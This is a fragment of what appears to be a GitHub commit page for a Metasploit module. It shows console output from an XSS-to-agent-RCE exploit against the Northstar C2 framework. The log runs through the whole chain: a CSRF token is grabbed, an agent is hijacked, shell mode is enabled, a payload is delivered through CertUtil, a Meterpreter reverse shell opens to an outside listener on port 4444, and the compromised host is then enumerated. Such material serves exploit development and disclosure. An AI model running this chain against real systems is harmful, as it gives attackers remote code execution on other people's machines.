[+] 1.1.1.1 northstar_c2_xss_to_agent_rce - CSRF Token: 38b4d324e8cd233b7a94c62e7b3c5556
[*] 1.1.1.1 northstar_c2_xss_to_agent_rce - (NC1S7X834eJVcJtynrq) Stealing DESKTOP-Q0HUOEI
[*] 1.1.1.1 northstar_c2_xss_to_agent_rce - (NC1S7X834eJVcJtynrq) Enabling shell mode
[+] 1.1.1.1 northstar_c2_xss_to_agent_rce - Command sent successfully to agent NC1S7X834eJVcJtynrq, response: Cmd mode enabled, all commands will be redirect to CMD. Response delay is : 2000 miliseconds
[*] 1.1.1.1 northstar_c2_xss_to_agent_rce - (NC1S7X834eJVcJtynrq) Running payload
[*] Client 222.222.22.222 requested /p3icRkNmQwbsIs7RYzV5sA
[*] Sending payload to 222.222.22.222 (Microsoft-CryptoAPI/10.0)
[*] Client 222.222.22.222 requested /p3icRkNmQwbsIs7RYzV5sA
[*] Sending payload to 222.222.22.222 (CertUtil URL Agent)
[*] Sending stage (201798 bytes) to 222.222.22.222
[*] Meterpreter session 1 opened (3.3.3.3:4444 -> 222.222.22.222:50116) at 2024-04-10 14:40:31 +0000
msf6 exploit(windows/http/northstar_c2_xss_to_agent_rce) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : DESKTOP-Q0HUOEI
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/window
```

Loading

0 comments on commit 69949b2

Please sign in to comment.